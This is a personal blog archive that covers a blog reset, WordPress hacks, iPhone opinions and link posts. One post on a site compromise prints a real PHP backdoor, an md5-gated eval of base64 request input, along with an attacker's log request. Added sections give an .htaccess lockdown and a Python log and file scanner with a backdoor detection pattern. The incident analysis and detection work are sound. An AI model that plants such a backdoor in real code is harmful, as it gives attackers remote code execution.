On the Subject of a Blog Reset, as a Series of Questions

Q: I thought you abandoned your blog in 2013 for twitter.

I did! And I’ve felt insanely guilty about it ever since.

Recently, however, I’ve been having more conversations on twitter where the 140-character limit is, well, limiting. I’ve found it frustrating to make any kind of a complex argument across a tweet thread, even with linked conversations. Some thoughts need more room.

I’ve also wanted for some time now to get back into the habit of writing for fun. The full-time day job I had until recently was sucking up a lot of my writing energy, and I’ve done very little writing in the last bunch of years that wasn’t job-related, or 140 characters or less.

But I recently left that day job, so now is as good a time as any for a full-on blog reset.

Q: What happened to blog.lauralemay.com?

Ages ago I set up my blog on a separate subdomain from my “main” site, and I can’t remember why. It seemed like a good idea at the time, maybe?

Having two different sites ended up being more annoying than I had intended. For one thing, I was trying to maintain two entirely different wordpress installs, with separate themes and plugins. (Yes, I know about WP multisite, and at the time I could not get it to work. LS;B (Long story, boring)).

With the reset I have merged everything back into www.lauralemay.com and a single wordpress install. The blog.lauralemay.com site still exists but I’m planning to put in a redirect once things here have settled down.

Q: I can’t believe you’re still using WordPress when you got so badly hacked, repeatedly, in the past. What’s wrong with you?

This is really a case of “better the devil you know.”

My original plan for a new blog had been to set up something simpler, easier to understand, and less prone to hacking problems than WordPress.

I spent a couple months earlier this year down a rabbit hole of learning all about static site generators (like Jekyll and Pelican and Hyde) for just this reason.

But the deeper into that rabbit hole I got, the more I realized how much work it was going to be to modify any static site software to output the design and structure and functionality I wanted. The time investment was going to be way more than I was willing to spend given that the actual goal was to write more, not spend more time working on software, or being my own sys admin.

WordPress has its issues, and I’ve seen a lot of them, but I understand it fairly well at this point. Also the community around themes and plugins is so rich that using WordPress gives you a huge step up in building a blog-like site versus starting everything from scratch.

Q: Yes, OK, but the hacking thing?

I figured out the hacking thing. If you put wp-login.php and the entire wp-admin directory behind access control (I use .htaccess) then the hacking stops. My old blog (and my old site) have been locked down like this for three years and I have had no further issues at all. (This is not a challenge.)
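For readers who want to see what that kind of lockdown looks like, here is an added example of Apache 2.4 basic-auth in front of wp-login.php and the wp-admin directory. It is illustration, not the author's actual .htaccess: the .htpasswd path and the IP range are placeholders. admin-ajax.php is carved out because themes and plugins call it on behalf of logged-out visitors, and locking it would break front-end features.

```apache
# In the site's root .htaccess: password-protect the login form.
# /srv/www/example/.htpasswd is a placeholder; create it with htpasswd(1).
<Files "wp-login.php">
    AuthType Basic
    AuthName "Administration"
    AuthUserFile /srv/www/example/.htpasswd
    Require valid-user
</Files>

# In wp-admin/.htaccess: the same gate for the whole admin directory ...
AuthType Basic
AuthName "Administration"
AuthUserFile /srv/www/example/.htpasswd
Require valid-user

# ... except admin-ajax.php, which front-end code calls for logged-out visitors.
<Files "admin-ajax.php">
    Require all granted
</Files>

# Alternative to a password: admit only a trusted network (placeholder range).
# Require ip 203.0.113.0/24
```

Two things to check after putting this in place. First, shared hosts do not always honor .htaccess for auth directives (AllowOverride has to include AuthConfig), so confirm with something like curl -I against /wp-login.php and /wp-admin/ and expect a 401, and confirm /wp-admin/admin-ajax.php still answers. Second, this only covers those two paths: PHP files that live under wp-content (theme and plugin scripts, like the timthumb case described further down this page) are still reachable by anyone, so the gate narrows the attack surface without removing it.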

Q: You don’t have comments enabled. When are you going to turn comments back on?

I’m not. I did leave the old comments in place on my old blog posts because it felt weird to just delete them. New posts do not have comments, and won’t.

Even on a blog as little-read as this one just managing spam in the comments was a pointless time sink. Replying to and managing actual real-life comments was also a lot less fun than I had thought it would be. At best I feel like I’m not keeping up, and guilty for not engaging better. At worst there are seemingly endless numbers of blowhards who use my comments to lecture or “well-actually” me, or to argue at length about things only semi-related to my actual posts. There are plenty of places to have an opinion on the Internet. This is mine. Get your own blog.

I am easily found on twitter or email if you really want to talk to me about something I’ve written.

Q: Are you going to talk endlessly about octopus and chickens all the time like you did before?

Yes! Also food, and cooking, and gardening. No links (those go on twitter). More personal stuff. And (I hope) much shorter posts rather than the 20-page essays and the immense multipart sagas I was doing before. (This post so far is not a good start.)

You will also occasionally see a post about technical writing, which is what I do for a living and a subject I feel strongly about (Yes, I know, I am strange). I am still figuring out the right way to categorize different subjects in the same blog, so we’ll see.

Titles will be properly uppercased this time around as well.

Q: Your ideas are intriguing to me and I wish to subscribe to your newsletter.

My new RSS feed is at http://www.lauralemay.com/feed. A blog-only feed (no pictures, links, tweets or other stuff sucked in from elsewhere) is http://www.lauralemay.com/blog/feed. You can also follow me on twitter for new post alerts.

In Which Laura Discovers Internet-Based Home Automation

Belkin WeMo: Control home electronics from your smart phone

L: OMG I want this!

E: Now you never need to look up from your smart phone to interact with the environment.

L: I was thinking it would be helpful for things like “did I forget to turn off the espresso machine again…”

E: Yeah…

L: Also, it is a $50 gadget that can replace a perfectly good $2.99 lamp timer! Who wouldn’t want that!

E: You can integrate it with your social media. Annoy your facebook friends with “Eric turned on the lamp! Eric turned off the lamp!” updates. It’s better than Farmville!

hacked, the followup

(I am getting a lot of hits on this post from google. If you came here because you think your wordpress install has been hacked as well, make sure you also read Hacked! and Hacked, Again!)

I’ve done nearly all the design updates I’m going to do to the blog for now although I have a plenty large To Do list left. Sadly it’s an almost entirely different To Do list than I had before this mess happened.

This is my technical followup to what happened; you can skip it if you don’t care about the details. It is long (of course). I’ll get back to talking about chickens and food soon enough.

We ended yesterday with a complete reinstall of all the files on all my web sites, including a brand new version of WordPress and a new database for this blog. In retrospect, this is what I should have done straight off on Monday. The #1 thing I have learned from this is when in doubt, assume it is WordPress and nuke it from space.

Notes on WordPress Security

I’m 99% sure that my hacker got into WordPress via a script called timthumb. This is a known WordPress vector for abuse — tons of themes and plugins use this script. In my case it was my theme, Thesis, that used it. This timthumb page has a lot of technical detail about why it is a problem, although the phrase “allowing hackers to upload and execute arbitrary PHP code” generally says it all.

There is a WordPress plugin called Timthumb Vulnerability Scanner that will check your entire WordPress installation for old versions of timthumb and make sure you are not subject to this hack. Note that I was using a current version of a respected paid theme and the most recent version of WordPress and the timthumb vulnerability was still there.

I also use the wp-security plugin for general WordPress security, which encourages you to make some of the more obvious changes to wordpress to keep hackers out (removing the admin account, renaming your database tables, etc.). I admit I had not implemented everything that wp-security recommended, because I was lazy. But even if I had it would not have helped with the timthumb hack.

The makers of wp-security have a web site called Website Defender that does much more in-depth security testing of your installation. I hadn’t gotten around to signing up for or installing the Website Defender tools (it requires some PHP to be placed on your web site, which, frankly, worried me right there). But a few people on twitter recommended it, so once I got my new software installed I set it up, and it looks MUCH more comprehensive for protecting WordPress. I kind of consider it anti-virus software for WordPress. They can keep track of new vulnerabilities so I don’t have to.

Lurking Horror in Non-Static Static HTML

I had been worried yesterday that my hacker was somehow able to modify files in my static HTML sites (my www.lauralemay.com and work.lauralemay.com sites) from the hacked WordPress blog site. This led me to believe that I actually had a worse hacker than just a web-based script-kiddie. It turns out I was wrong. PHP was the problem, and I had PHP everywhere that I just didn’t know about or wasn’t paying attention to. This was my fault for not being more diligent.

In the case of my www site, I once ran Movable Type there, and although I had turned off the software itself years ago I still had the files sitting around in the directory and accessible from the web. Tons of PHP floating around in there. This was dumb of me to keep around, especially since it was a very old version of Movable Type.

I was sure that my work site was safe. I wrote all that myself, in plain HTML and CSS. And then buried deep in a sub-sub-sub directory I found one PHP file that Dreamweaver of all things had written as part of “design notes” for the site. I know there was one time I used Dreamweaver for the site but it was years ago and I thought I had long since deleted all those extra notes directories. ONE FILE I didn’t even know was there, but the hacker scripts found it, and that was all it took. (Fortunately all I had to do was trash that one file and that was the end of it.)

I See You

While I was sitting around waiting for stuff to install and reimport and whatnot I got to thinking that maybe there were traces of my hacker in my access and error logs. Fortunately this is not a high-traffic web site (hah), so I could grep out typical requests and page through the rest of my logs without having to look at a zillion lines. A whole lot of lines like this one immediately stood out:

46.37.184.254 - - [04/Jan/2012:03:10:38 -0800] "GET /wp-admin/includes/schema.php?
img_id=1f3870be274f6c49b3e31a0c6728957f&mod_content=ZWNobyAiZ29vZ2xlZWVlIjs= 
HTTP/1.0" 301 572 "http://facebook.com/" "Mozilla/4.0 (compatible; MSIE 8.0; 
Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 
3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; Tablet PC 2.0; .NET4.0C)" 

I know of no legitimate reason for anyone to request anything inside wp-admin unless they are actually administering the site. There’s especially no reason to request schema.php, and no reason at all to give it arguments (img_id and mod_content). I had a copy of my hacked site on my local machine, and I took a look at schema.php. Bingo. Right at the top of the file, above the comments:

<?php
// Prepended above the file's normal header. The gate: the caller must supply an
// img_id whose md5 equals the hard-coded digest, and then whatever base64-encoded
// PHP arrives in mod_content is decoded and executed.
if ((md5($_REQUEST["img_id"]) == "ae6d32585ecc4d33cb8cd68a047d8434")
    && isset($_REQUEST["mod_content"])) {
    eval(base64_decode($_REQUEST["mod_content"]));
    exit();
}
?>

eval(base64_decode you say? I don’t think so. I searched my entire blog site, and found about ten PHP files all over the place that had these lines scribbled at the start. Then I looked through my log files and there was my hacker, always at the same IP address, always pinging those same hacked files.

None of this actually really mattered, since I had trashed all the hacked files when I reinstalled WordPress. But one of the first things I did when my new site was set up was to block that IP address. And today as I watch my logs roll by I am pleased to see “client denied by server configuration” coming up again and again.
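The two checks described above, grepping the access log for requests that feed the backdoor and searching the document root for files with the eval(base64_decode gate prepended, as an added example that is not part of the original post. The first sample log line is the request quoted above (user agent shortened); the other two lines and the files the demo scans are constructed. The decoded payload in that request is the attacker's own probe that the gate works.

```python
"""Find requests that feed an eval(base64_decode()) backdoor, and the files that carry it."""
import base64
import binascii
import re
import tempfile
from pathlib import Path
from urllib.parse import parse_qs, urlsplit

# Apache "combined" log format, up to the status code; the rest is not needed here.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)(?: [^"]*)?" (?P<status>\d{3})'
)

# The injected gate: eval() of a base64-decoded request parameter.
BACKDOOR_RE = re.compile(
    rb'eval\s*\(\s*base64_decode\s*\(\s*\$_(?:REQUEST|GET|POST|COOKIE)\b',
    re.IGNORECASE,
)

# Constructed sample: line 1 is the request quoted in the post, lines 2 and 3 are made up
# (an ordinary page view, and a hit whose payload is not valid base64).
SAMPLE_LOG = """\
46.37.184.254 - - [04/Jan/2012:03:10:38 -0800] "GET /wp-admin/includes/schema.php?img_id=1f3870be274f6c49b3e31a0c6728957f&mod_content=ZWNobyAiZ29vZ2xlZWVlIjs= HTTP/1.0" 301 572 "http://facebook.com/" "Mozilla/4.0"
203.0.113.7 - - [04/Jan/2012:03:11:02 -0800] "GET /2012/01/chickens/ HTTP/1.1" 200 8123 "-" "Mozilla/5.0"
46.37.184.254 - - [04/Jan/2012:03:12:45 -0800] "POST /wp-content/themes/example/lib/foo.php?img_id=1f3870be274f6c49b3e31a0c6728957f&mod_content=not*base64! HTTP/1.0" 200 34 "-" "Mozilla/4.0"
"""


def parse_line(line):
    """Return the interesting fields of one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    url = urlsplit(m.group("target"))
    return {
        "ip": m.group("ip"),
        "path": url.path,
        "params": parse_qs(url.query, keep_blank_values=True),
        "status": int(m.group("status")),
    }


def decode_payload(value):
    """Strict base64 decode; None when the value is not base64 at all."""
    try:
        return base64.b64decode(value, validate=True).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return None


def suspicious_requests(log_text):
    """Flag requests carrying the backdoor's parameter, and direct requests to library
    files under wp-admin/includes/ (nothing legitimate fetches those by URL)."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        reasons = []
        if "mod_content" in rec["params"]:
            reasons.append("mod_content parameter")
        if rec["path"].startswith("/wp-admin/includes/") and rec["path"].endswith(".php"):
            reasons.append("direct request to wp-admin/includes")
        if not reasons:
            continue
        payload = rec["params"].get("mod_content", [None])[0]
        hits.append({
            "ip": rec["ip"],
            "path": rec["path"],
            "reasons": reasons,
            "decoded": decode_payload(payload) if payload is not None else None,
        })
    return hits


def find_backdoored_php(root, head_bytes=4096):
    """Walk a document root and list PHP files whose first bytes contain the gate."""
    root = Path(root)
    found = []
    for path in sorted(root.rglob("*.php")):
        with path.open("rb") as fh:
            head = fh.read(head_bytes)
        if BACKDOOR_RE.search(head):
            found.append(path.relative_to(root).as_posix())
    return found


def demo_scan():
    """Constructed fixture: one clean file and one file with the gate prepended."""
    gate = (b'<?php if((md5($_REQUEST["img_id"]) == "ae6d32585ecc4d33cb8cd68a047d8434")\n'
            b'&& isset($_REQUEST["mod_content"])) { eval(base64_decode($_REQUEST'
            b'["mod_content"])); exit(); } ?>\n')
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        inc = root / "wp-admin" / "includes"
        inc.mkdir(parents=True)
        (inc / "schema.php").write_bytes(gate + b"<?php\n/**\n * Schema API\n */\n")
        (root / "index.php").write_bytes(b"<?php\nrequire __DIR__ . '/wp-blog-header.php';\n")
        return find_backdoored_php(root)


if __name__ == "__main__":
    for hit in suspicious_requests(SAMPLE_LOG):
        print(hit["ip"], hit["path"], hit["reasons"], repr(hit["decoded"]))
    print(demo_scan())
```

Run against a real log, the decoded column is the useful part: a payload that is not valid base64 is still a hit (the attacker may be probing a different encoding), and a payload that decodes to readable PHP tells you what was run. The file scan only reads the head of each file because the gate was prepended; a thorough sweep of a compromised tree should drop that limit and also look for the same pattern with other obfuscation wrappers.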

Feeeelings

I’m not feeling the least bit confident about web software right now, and thinking about the security problems of complex web applications in general is making me break out in hives. It seems that the more complex a web app is the more likely it is that someone out there is going to fuck with it, and I just don’t have the time for that. I went to shared hosting precisely because I was tired of being my own sys admin. I can do it, but I’m not all that good at it, and I don’t want to. I want to write.

On the other hand, the idea of giving up all the administration and putting all my stuff in the cloud also doesn’t give me happy warm fuzzies. Because of course in that situation the cloudmasters are hadooping away on everything I do and generating all sorts of valuable advertising thneeds.

Either way it seems I’m eventually going to be pwned by someone.

grumble.

hacked!

(I am getting a lot of hits on this post from google. If you came here because you think your wordpress install has been hacked as well, make sure you also read Hacked, Again! and Hacked, the Followup)

So, I had a fun afternoon, how about you?

A week or so ago, I noticed an odd thing: Google Reader had stopped updating my blog feeds. Around that time I had been mucking with the blog feeds (see Housekeeping) so I figured maybe I had confused Google Reader, and if I ignored it, maybe it would go away.

Hint: if Google gets annoyed at your web site, perhaps there is something wrong with your web site.

Then yesterday I noticed that if I unsubscribed to my blog feed in Google Reader and resubscribed to it, the title to my blog would not come up. Instead Google Reader decided the title was “Personal Creations Elmo, Consumer Payday Loans – $300 – $2500.”

I became indignant. My blog looked fine to me. It looked fine from a variety of other locations. The code looked fine if I grabbed it with curl. Something was wrong with Google.

Hint: It’s unlikely something is wrong with Google. Something might be wrong with your site.

Then it got worse and it spread to my search results:

(screenshot: Google search results for the site)

At the same time a friend sent me a screen shot of my web site as he saw it:

(screenshot: the site as a friend saw it)

Yeah, I got hacked. But it was a selective hack; only the google and yahoo crawlers and referers from google and yahoo saw it. (no one actually uses the Yahoo search engine.)

I spent the day cleaning up from this hack, including doing it twice because it came back. I still don’t know where it came from or if it’s going to come back again. This was not a lot of fun.

I googled what I found and turned up almost no information at all; no exploits, no descriptions, no patches, nothing. I don’t know if what I had was new, or if it was obscure, or what. Technical details in the More part of this post.

why I am not buying an iPhone

Update: Damn, this is a popular post. I am replying to comments below but I should note that I am not an iPhone expert. I have no special knowledge. I’m watching the news and the videos and reading the blogs like everyone else is. If you’re here looking for iPhone information consider the page on the iPhone on Wikipedia which has collected a lot of what is currently known about it. Keep in mind also that there’s a whole lot that ISN’T known and won’t be known until the iPhone is released on Friday and people actually take it apart and play with it.

Please note also that if you spam my blog with iPhone questions you’ve asked on every other blog that mentions the iPhone I will delete you. That’s really rude.

I’ve been asked a lot over the last week if I am going to be buying an iPhone, and twice if I’m going to be camping out to buy an iPhone. For some reason, I can’t imagine why, she said, innocently, I seem to have acquired the reputation for being kind of a cell phone freak.

I am not going to buy an iPhone, at least not this version. I am not an iPhone Hater, as those who lust for the iPhone are calling the doubters, but I personally feel little iPhone lust. My reasons:

  • The virtual keyboard. I’m a heavy smartphone keyboard user; I am a double-thumb typer and I rely on the feel of the keys to type fast and accurately. The word on the street so far is that the iPhone’s virtual keyboard takes some getting used to but is not as bad as it looks, especially if you trust the error correction to work for you. I would like to see it for myself, and I would like real people to use it for a while and to express real world opinions (can the blackberry people use it? That’s what I want to know). I’m also suspicious that any virtual keyboard will ever be as comfortable to type on as a real keyboard with pressable keys. I have a hell of a time with real full size keyboards that do not have good tactile feedback; the joints in my hands hurt. Given how often I type and my experiences over the years with stress injuries in my hands this is something I pay attention to. I do not want a phone that will land me in physical therapy, no matter how cool it is.
  • The slow data connection. I was stunned when I heard in the original iPhone announcement that they were going with an EDGE cell connection. AT&T has a fast HSDPA 3G network in most major markets — I cannot comprehend why they didn’t use it. Apple seems to be blithely assuming that you can drop down to wifi at any time and then the connection will be speedy but as someone who has had a wifi phone for the last year I can assure future iPhone users that free and open wifi connections are not as ubiquitous as you might think, even in major urban areas. You will have to rely on EDGE, and EDGE is slow. I have EDGE with T-mobile and it is acceptable if you’re patient, but you have to be very patient. If you’re used to broadband or an EVDO connection it is going to drive you nuts.
  • I hate AT&T. OK, I hate all cell carriers. They are all evil. AT&T is perhaps more grossly incompetent and money-grubbing than sheer evil, but AT&T is still a big vote for iPhone: NO right there. It’s going to take an awful lot to get me to sign up with AT&T, especially with a two-year contract, although now that they’ve announced the iPhone plans and they are remarkably simple and not stupidly named (you have the “Elbows Landscape plan with My Hazelnuts”) I’m a bit less suspicious. To be fair, I would probably have precisely this same argument with any carrier at all, including T-Mobile where I am now.
  • $500+ for a phone no one has even seen. Speaking as someone who spent $500 on a phone last year that I hadn’t even seen this may seem like an odd complaint. I spent full retail on an unlocked, untethered phone, and I would do it again. I didn’t spend $500 on a phone that would also lock me into a $2000 long term contract with a carrier whose service I know isn’t all that great.
  • It is a first generation Apple device. I have had on-and-off experiences with first generation Apple devices; My first generation PowerPC mac was a complete mess; my first generation iPod was replaced once under warranty and broke again a few months later; my first generation 12″ powerbook was rock solid for its entire useful life and I loved it so much I bought another one. The iPhone is new enough in a variety of ways — and cell phones are integral enough to my life that I would really hurt if it broke — that I think I’ll sit out the first generation.
  • It’s just not that huge a revolution right now. It is an absolutely beautiful phone. The interface is gorgeous and there are obviously some really new ideas in interaction design there that are truly fascinating. Once the crowds in the stores die down I will be there in the Apple Store playing with it. I can definitely see buying one later on. But now? I have email and the web and Google Maps and text messaging on my phone. I have a camera and music. And I also have video and games and third-party applications. The interface isn’t as pretty on my Nokia. The screen is really small. The apps could be better designed and more useful. But it’s good for now.

I’ll wait.

In the meantime I do seem to have accidentally acquired a Nokia Internet Tablet. It’s a wifi-based web browser and email device with a big high resolution screen that runs Linux. I’m not exactly sure what came over me there.

very, very well documented

And while I’m on the subject of documentation, here’s a great story from the former The Daily WTF.com, now known (sadly) as WorseThanFailure.com, called Very, Very Well Documented.

George’s contact at the Air Force was a gruff, old general with a vast knowledge of aerial warfare and forty years experience in the service. Naturally, he was very skeptical of the new guys’ ability to develop a ‘military grade’ product. After all, they hadn’t spent a single day in uniform. But George’s team quickly won him over with a demonstration: one month after being awarded the contract, they had fully replicated the prototype plane’s specifications in their software. [..]

‘Gentlemen,’ the general started during one of their wrap-up meetings, ‘you have done very well. I am very impressed. There is, however, one problem. You did not provide nearly enough documentation.’ […]

‘You see gentlemen,’ the general continued, ‘for such expensive program, we require at least eight meters of documentation.’ He stretched his arms as far as he could to illustrate. Clearly, he was not joking.

(read the rest of the story)

(I got it from The Daily WTF.)

the true story of the emu press

A long time ago here I posted about the manual for the MN-156 Reciprocating Emu Press, which was mysteriously stored on Amazon’s media servers. I ended that post wondering what the real story was behind this amusing parody of a user manual.

A while ago mad_eponine, the author of the Reciprocating Emu Press manual, sent me email pointing me to this livejournal post with the real story, including how it ended up at Amazon. It is brilliant. I am happy to have played a small role in the saga.

iphone user’s guide

The iPhone, a User’s Guide (McSweeney’s)

I . Introduction
II. Turning on the iPhone
III. Making a call using the iPhone

XI. Using the iPhone to explain how the internal board committee of Apple Computer Inc. (before the name change) headed by Al Gore could exonerate Steve Jobs of any wrongdoing in the options-backdating scandal

XVII. Using the iPhone to assist Nicole Kidman in playing a frankly commercial Mrs. Coulter in the new adaptation of The Golden Compass without losing the anti-Miltonian vibe or the stuff about the Magisterium

XIX. Using the iPhone to learn whether Ehud Barak ever considered adopting Barack Obama and changing the Illinois junior senator’s name to Barack Barak

kathy sierra, or, imminent death of the net predicted

I’m coming in late to comment on the Kathy Sierra situation. The wail of shock and anguish that passed over the internet about it has started to subside, and there’s already been a whole lot (a WHOLE lot) said on the topic.

If you missed it, here’s the story: Kathy Sierra, co-creator of the Head First line of computer books and one of my favourite writers, has been receiving death threats and harassment on her blog and elsewhere on the net. Because of it she cancelled her keynote and tutorials at Etech and was considering giving up blogging altogether. She talked about it on her blog in a post titled Death threats against bloggers are NOT “protected speech”. Warning: there are some disturbing words and images there, and there are over 1000 comments so it’s very long to load.

This, in turn, is a very long post and not what I usually write about on this blog, so see more after the jump. (feed readers and livejournallers, you probably know by now that you get the whole thing and there is no “jump”).
